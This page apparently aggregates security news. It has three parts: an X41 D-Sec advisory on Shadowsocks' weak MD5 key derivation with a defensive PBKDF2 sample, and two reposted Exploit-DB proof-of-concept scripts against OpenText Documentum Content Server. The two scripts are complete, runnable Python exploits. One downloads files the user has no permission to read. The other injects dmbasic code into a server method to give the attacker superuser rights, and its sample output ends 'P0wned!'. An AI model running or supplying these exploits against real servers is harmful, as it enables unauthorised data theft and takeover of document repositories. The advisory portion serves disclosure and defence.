Shadowsocks uses no brute force prevention for its key derivation function.

The key for Shadowsocks traffic encryption is static and derived from
the password, using MD5. The password derivation is in encrypt.py,
lines 56 to 63:

    while len(b''.join(m)) < (key_len + iv_len):
        md5 = hashlib.md5()
        data = password
        if i > 0:
            data = m[i - 1] + password
        md5.update(data)
        m.append(md5.digest())
        i += 1

MD5 should not be used to generate keys, since it is a hash function.
A proper key derivation function increases the cost of this operation,
which is a small burden for a user, but a big one for an attacker,
who performs this operation many more times. As passwords usually have
low entropy, a good password derivation function has to be slow.


Workarounds
-----------
Use a secure password generated by a cryptographically secure random
generator. Wait for a patch that uses a password based key derivation
function like "Argon2" instead of a hash.
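
An added example (not code from the advisory or from Shadowsocks)
contrasting the MD5 loop quoted above with a salted, iterated
derivation. PBKDF2-HMAC-SHA256 from the Python standard library stands
in for the Argon2 the advisory recommends; the key/IV split, the salt
size and the iteration count are assumptions.

```python
import hashlib
import os


def md5_derive(password, key_len=32, iv_len=16):
    """The advisory's loop, completed: chained MD5, no salt, no work factor.

    Returns (key, iv, md5_calls). Splitting the output into key and IV is an
    assumption; the page only shows the loop.
    """
    m = []
    i = 0
    while len(b"".join(m)) < (key_len + iv_len):
        data = password if i == 0 else m[i - 1] + password
        m.append(hashlib.md5(data).digest())
        i += 1
    out = b"".join(m)
    return out[:key_len], out[key_len:key_len + iv_len], i


def kdf_derive(password, salt, iterations=600000, key_len=32):
    """Salted, iterated derivation; each guess costs `iterations` HMAC rounds."""
    if len(salt) < 16:
        raise ValueError("salt must be at least 16 bytes")
    if iterations < 1:
        raise ValueError("iterations must be positive")
    return hashlib.pbkdf2_hmac("sha256", password, salt, iterations, dklen=key_len)


def new_salt():
    """Per-deployment random salt, stored next to the configuration."""
    return os.urandom(16)


if __name__ == "__main__":
    pw = b"correct horse"  # constructed sample password
    key, iv, calls = md5_derive(pw)
    # Same password always yields the same key, and a guess costs `calls` MD5s.
    print("md5 :", key.hex(), "hash calls per guess:", calls)
    salt = new_salt()
    # Same password, different salt: a different key, at a chosen cost per guess.
    print("kdf :", kdf_derive(pw, salt).hex())
```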



About X41 D-Sec GmbH
--------------------
X41 D-Sec is a provider of application security services. We focus on
application code reviews, design review and security testing. X41 D-Sec
GmbH was founded in 2015 by Markus Vervier. We support customers in
various industries such as finance, software development and public
institutions.


Timeline
--------
2017-09-28  Issues found
2017-10-05  Vendor contacted
2017-10-09  Vendor contacted, replied to use GitHub for a full disclosure
2017-10-11  Vendor contacted, asked whether the vendor is sure it wants
            a full disclosure
2017-10-12  Vendor contacted, replied to create a public issue on GitHub
2017-10-13  Created public issues on GitHub
2017-10-13  Advisory release

Security News

via Exploit-DB Updates http://ift.tt/1HHo1m3

October 17, 2017 at 02:08PM

[webapps] OpenText Documentum Content Server – Arbitrary File Download

http://ift.tt/2xMWKll

#!/usr/bin/env python

# OpenText Documentum Content Server (formerly known as EMC Documentum Content Server)
# contains the following design gap, which allows an authenticated user to download arbitrary
# content files regardless of the attacker's repository permissions:
#
# when an authenticated user uploads content to the repository, he performs the following steps:
# - calls the START_PUSH RPC command
# - uploads the file to Content Server
# - calls the END_PUSH_V2 RPC command; here Content Server returns DATA_TICKET,
#    which identifies the location of the uploaded file on the Content Server filesystem
# - then the user creates a dmr_content object in the repository, whose data_ticket value is equal
#    to the value of DATA_TICKET returned at the end of the END_PUSH_V2 call
#
# As a result of this design, any authenticated user may create his own dmr_content object
# pointing to already existing content on the Content Server filesystem
#
# The PoC below demonstrates this vulnerability:
#
# MacBook-Pro:~ $ python CVE-2017-15014.py
# usage:
# CVE-2017-15014.py host port user password
# MacBook-Pro:~ $ python CVE-2017-15014.py docu72dev01 10001 dm_bof_registry dm_bof_registry
# Trying to connect to docu72dev01:10001 as dm_bof_registry ...
# Connected to docu72dev01:10001, docbase: DCTM_DEV, version: 7.2.0270.0377  Linux64.Oracle
# Trying to find any object with content...
# Querying "inaccessible" dmr_content objects...
# Downloaded 3959/3959 bytes of object 06024be980000133
# Downloaded 11280/11280 bytes of object 06024be980000135
# Downloaded 10004/10004 bytes of object 06024be980000138
# Downloaded 23692/23692 bytes of object 06024be98000017a
# Downloaded 19541/19541 bytes of object 06024be980000180
# Downloaded 1096/1096 bytes of object 06024be980000172
# Downloaded 11776/11776 bytes of object 06024be98000011f
# Downloaded 50176/50176 bytes of object 06024be980000125
# Downloaded 16384/16384 bytes of object 06024be98000012f
# Downloaded 985/985 bytes of object 06024be9800001f5
# Downloaded 191/191 bytes of object 06024be9800001fe
# Downloaded 213/213 bytes of object 06024be980000200
#



import socket
import sys

from dctmpy import NULL_ID

from dctmpy.docbaseclient import DocbaseClient
from dctmpy.obj.typedobject import TypedObject

CIPHERS = "ALL:aNULL:!eNULL"


def usage():
    print "usage:\n%s host port user password" % sys.argv[0]


def main():
    if len(sys.argv) != 5:
        usage()
        exit(1)

    (session, docbase) = create_session(*sys.argv[1:5])

    if is_super_user(session):
        print "Current user is a superuser, nothing to do"
        exit(1)

    print "Trying to find any object with content..."
    object_id = session.query(
        "SELECT FOR READ r_object_id "
        "FROM dm_sysobject WHERE r_content_size>0") \
        .next_record()['r_object_id']
    session.apply(None, NULL_ID, "BEGIN_TRANS")
    print "Querying \"inaccessible\" dmr_content objects..."
    for e in session.query(
            "SELECT * FROM dmr_content "
            "WHERE ANY parent_id IS NOT NULLID "
            "AND ANY parent_id NOT IN "
            "(SELECT r_object_id FROM dm_sysobject)"
    ):
        handle = 0
        try:
            content_id = session.next_id(0x06)
            obj = TypedObject(session=session)
            obj.set_string("OBJECT_TYPE", "dmr_content")
            obj.set_bool("IS_NEW_OBJECT", True)
            obj.set_int("i_vstamp", 0)
            obj.set_id("storage_id", e["storage_id"])
            obj.set_id("format", e["format"])
            obj.set_int("data_ticket", e["data_ticket"])
            obj.set_id("parent_id", object_id)
            if not session.save_cont_attrs(content_id, obj):
                print "Failed"
                exit(1)

            handle = session.make_puller(
                NULL_ID, obj["storage_id"], content_id,
                obj["format"], obj["data_ticket"]
            )
            if handle == 0:
                raise RuntimeError("Unable make puller")
            size = 0
            for chunk in session.download(handle):
                size += len(chunk)

            print "Downloaded %d/%d bytes of object %s" % \
                  (size, e['full_content_size'], e['r_object_id'])
        finally:
            if handle > 0:
                try:
                    session.kill_puller(handle)
                except:
                    pass


def create_session(host, port, user, pwd):
    print "Trying to connect to %s:%s as %s ..." % (host, port, user)
    session = None
    try:
        session = DocbaseClient(
            host=host, port=int(port),
            username=user, password=pwd)
    except socket.error, e:
        if e.errno == 54:
            session = DocbaseClient(
                host=host, port=int(port),
                username=user, password=pwd,
                secure=True, ciphers=CIPHERS)
        else:
            raise e
    docbase = session.docbaseconfig['object_name']
    version = session.serverconfig['r_server_version']
    print "Connected to %s:%s, docbase: %s, version: %s" % \
          (host, port, docbase, version)
    return (session, docbase)


def is_super_user(session):
    user = session.get_by_qualification("dm_user WHERE user_name=USER")
    if user['user_privileges'] == 16:
        return True
    group = session.get_by_qualification(
        "dm_group where group_name='dm_superusers' "
        "AND any i_all_users_names=USER")
    if group is not None:
        return True

    return False


if __name__ == '__main__':
    main()

Security News

via Exploit-DB Updates http://ift.tt/1HHo1m3

October 17, 2017 at 02:08PM

[webapps] OpenText Documentum Content Server – dmr_content Privilege Escalation

http://ift.tt/2kWJIf4

#!/usr/bin/env python

# OpenText Documentum Content Server (formerly known as EMC Documentum Content Server)
# contains the following design gap, which allows an authenticated user to gain the privileges
# of a superuser:
#
# Content Server stores information about uploaded files in dmr_content objects,
# which are queryable and "editable" by authenticated users (before release 7.2P02 any
# authenticated user was able to edit dmr_content objects; now any authenticated user may
# delete a dmr_content object and then create a new one with the old identifier). This allows
# any authenticated user to "modify" security-sensitive dmr_content objects (for example,
# dmr_content related to dm_method objects) and gain superuser privileges
#
# The PoC below demonstrates this vulnerability:
#
# MacBook-Pro:~ $ python CVE-2017-15013.py
# usage:
# CVE-2017-15013.py host port user password
# MacBook-Pro:~ $ python CVE-2017-15013.py docu72dev01 10001 dm_bof_registry dm_bof_registry
# Trying to connect to docu72dev01:10001 as dm_bof_registry ...
# Connected to docu72dev01:10001, docbase: DCTM_DEV, version: 7.2.0270.0377  Linux64.Oracle
# Trying to find any dm_method object with content...
#     Trying to poison docbase method dm_Migration
# Method verb: dmbasic -eMigration_Agent
# Method function: Migration_Agent
# Trying to inject new content:
# Const glabel As String          = "Label"
# Const ginfo As String           = "Info"
# Const gerror As String          = "Error"
#
# Private Sub PrintMessage(mssg As String, mssgtype As String)
# If(mssgtype=glabel) Then
# Print "<BR><B><FONT size=3>"
# Print mssg
# print "</FONT></B>"
# ElseIf(mssgtype=ginfo) Then
# Print "<BR><FONT color=blue>"
# Print mssg
# print "</FONT>"
# ElseIf(mssgtype=gerror) Then
# Print "<BR><FONT color=red size=3>"
# Print mssg
# print "</FONT>"
# Else
# Print "<BR>" & mssg
# End If
# End Sub
# Private Sub SetupSuperUser(TargetUser As String)
# objectid$ = dmAPIGet("id,c,dm_user where user_name = '" & TargetUser & "'")
# If objectid$ <> "" then
# Status = dmAPISet("set,c," & objectid$ & ",user_privileges",16)
# Status = dmAPIExec("save,c," & objectid$)
# End If
# End Sub
#
# Sub Migration_Agent(DocbaseName As String, UserName As String, TargetUser As String)
# Dim SessionID As String
#
# SessionID= dmAPIGet("connect," & DocbaseName & "," & UserName & ",")
# If SessionID ="" Then
# Print "Fail to connect to docbase " & DocbaseName &" as user " & UserName
# DmExit(-1)
# Else
# Print "Connect to docbase " & DocbaseName &" as user " & UserName
# End If
#
# Call SetupSuperUser(TargetUser)
#
# End Sub
#
# Removing method's content
# method's content has been successfully removed
# Creating malicious dmr_content object
# Malicious dmr_content object has been successfully created
# Becoming superuser...
# P0wned!
# MacBook-Pro:~ $ python CVE-2017-15013.py docu72dev01 10001 dm_bof_registry dm_bof_registry
# Trying to connect to docu72dev01:10001 as dm_bof_registry ...
# Connected to docu72dev01:10001, docbase: DCTM_DEV, version: 7.2.0270.0377  Linux64.Oracle
# Current user is a superuser, nothing to do
#



import socket
import sys

from dctmpy import NULL_ID, RPC_APPLY_FOR_BOOL, RPC_APPLY_FOR_OBJECT

from dctmpy.docbaseclient import DocbaseClient
from dctmpy.obj.typedobject import TypedObject

CIPHERS = "ALL:aNULL:!eNULL"


def usage():
    print "usage:\n%s host port user password" % sys.argv[0]


def main():
    if len(sys.argv) != 5:
        usage()
        exit(1)

    (session, docbase) = create_session(*sys.argv[1:5])

    if is_super_user(session):
        print "Current user is a superuser, nothing to do"
        exit(1)

    print "Trying to find any dm_method object with content..."
    method_object = session.get_by_qualification(
        "dm_method WHERE use_method_content=TRUE "
        "and method_verb like 'dmbasic -e%'")
    method_content = session.get_by_qualification(
        "dmr_content where any parent_id='%s'"
        % method_object['r_object_id'])

    print "Trying to poison docbase method %s" % method_object['object_name']
    method_verb = method_object['method_verb']
    print "Method verb: %s" % method_verb
    method_function = method_verb[len("dmbasic -e"):]
    print "Method function: %s" % method_function
    new_content = \
        "Const glabel As String          = \"Label\"\n" \
        "Const ginfo As String           = \"Info\"\n" \
        "Const gerror As String          = \"Error\"\n" \
        "\n" \
        "Private Sub PrintMessage(mssg As String, mssgtype As String)\n" \
        "  If(mssgtype=glabel) Then\n" \
        "            Print \"<BR><B><FONT size=3>\"\n" \
        "            Print mssg\n" \
        "            print \"</FONT></B>\"\n" \
        "  ElseIf(mssgtype=ginfo) Then\n" \
        "            Print \"<BR><FONT color=blue>\"\n" \
        "            Print mssg\n" \
        "            print \"</FONT>\"\n" \
        "  ElseIf(mssgtype=gerror) Then\n" \
        "            Print \"<BR><FONT color=red size=3>\"\n" \
        "            Print mssg\n" \
        "            print \"</FONT>\"\n" \
        "  Else\n" \
        "            Print \"<BR>\" & mssg\n" \
        "  End If\n" \
        "End Sub\n" \
        "Private Sub SetupSuperUser(TargetUser As String)\n" \
        "   objectid$ = dmAPIGet(\"id,c,dm_user where user_name = '\" & TargetUser & \"'\")\n" \
        "   If objectid$ <> \"\" then\n" \
        "      Status = dmAPISet(\"set,c,\" & objectid$ & \",user_privileges\",16)\n" \
        "      Status = dmAPIExec(\"save,c,\" & objectid$)\n" \
        "   End If\n" \
        "End Sub\n" \
        "\n" \
        "Sub %s(DocbaseName As String, UserName As String, TargetUser As String)\n" \
        "  Dim SessionID As String\n" \
        "\n" \
        "  SessionID= dmAPIGet(\"connect,\" & DocbaseName & \",\" & UserName & \",\")\n" \
        "  If SessionID =\"\" Then\n" \
        "    Print \"Fail to connect to docbase \" & DocbaseName &\" as user \" & UserName\n" \
        "    DmExit(-1)\n" \
        "  Else\n" \
        "    Print \"Connect to docbase \" & DocbaseName &\" as user \" & UserName\n" \
        "  End If\n" \
        "\n" \
        "  Call SetupSuperUser(TargetUser)\n" \
        "\n" \
        "End Sub\n" % method_function
    print "Trying to inject new content:\n%s" % new_content

    session.apply(None, NULL_ID, "BEGIN_TRANS")

    if method_content is not None:
        print "Removing method's content"
        remove = TypedObject(session=session)
        remove.set_string("OBJECT_TYPE", "dmr_content")
        remove.set_int("i_vstamp", method_content['i_vstamp'])
        obj = session.apply(RPC_APPLY_FOR_BOOL, method_content['r_object_id'], "dmDisplayConfigExpunge", remove)
        if obj != True:
            print "Failed to remove method's content, exiting"
            end_tran(session, False)
            exit(1)
        print "method's content has been successfully removed"

    store = session.get_by_qualification("dm_store")
    format = session.get_by_qualification("dm_format where name='crtext'")

    handle = session.make_pusher(store['r_object_id'])
    if handle < 1:
        print "Unable to create pusher"
        end_tran(session, False)
        exit(1)

    b = bytearray()
    b.extend(new_content)

    if not session.start_push(handle, method_object['i_contents_id'], format['r_object_id'], len(b)):
        print "Failed to start push"
        end_tran(session, False)
        exit(1)

    session.upload(handle, b)
    data_ticket = session.end_push_v2(handle)['DATA_TICKET']

    print "Creating malicious dmr_content object"
    content = TypedObject(session=session)
    content.set_string("OBJECT_TYPE", "dmr_content")
    content.set_bool("IS_NEW_OBJECT", True)
    content.set_id("storage_id", store['r_object_id'])
    content.set_id("format", format['r_object_id'])
    content.set_int("data_ticket", data_ticket)
    content.set_id("parent_id", method_object['r_object_id'])
    content.set_int("page", 0)
    content.set_string("full_format", format['name'])
    content.set_int("content_size", len(b))
    if not session.save_cont_attrs(method_object['i_contents_id'], content):
        print "Failed to create content"
        end_tran(session, False)
        exit(1)

    print "Malicious dmr_content object has been successfully created"

    end_tran(session, True)

    print "Becoming superuser..."
    method = TypedObject(session=session)
    method.set_string("METHOD", method_object['object_name'])
    method.set_string("ARGUMENTS", "%s %s %s" % (
        session.docbaseconfig['object_name'],
        session.serverconfig['r_install_owner'],
        sys.argv[3]))
    session.apply(RPC_APPLY_FOR_OBJECT, NULL_ID, "DO_METHOD", method)
    r = session.query(
        "SELECT user_privileges FROM dm_user "
        "WHERE user_name=USER") \
        .next_record()[
        'user_privileges']
    if r != 16:
        print "Failed"
        exit(1)
    print "P0wned!"


def end_tran(session, commit=False):
    obj = TypedObject(session=session)
    obj.set_bool("COMMIT", commit)
    session.apply(None, NULL_ID, "END_TRANS", obj)


def create_session(host, port, user, pwd):
    print "Trying to connect to %s:%s as %s ..." % (host, port, user)
    session = None
    try:
        session = DocbaseClient(
            host=host, port=int(port),
            username=user, password=pwd)
    except socket.error, e:
        if e.errno == 54:
            session = DocbaseClient(
                host=host, port=int(port),
                username=user, password=pwd,
                secure=True, ciphers=CIPHERS)
        else:
            raise e
    docbase = session.docbaseconfig['object_name']
    version = session.serverconfig['r_server_version']
    print "Connected to %s:%s, docbase: %s, version: %s" % \
          (host, port, docbase, version)
    return (session, docbase)


def is_super_user(session):
    user = session.get_by_qualification("dm_user WHERE user_name=USER")
    if user['user_privileges'] == 16:
        return True
    group = session.get_by_qualification(
        "dm_group where group_name='dm_superusers' "
        "AND any i_all_users_names=USER")
    if group is not None:
        return True

    return False


if __name__ == '__main__':
    main()

Security News

via Exploit-DB Updates http://ift.tt/1HHo1m3

October 17, 2017 at 02:08PM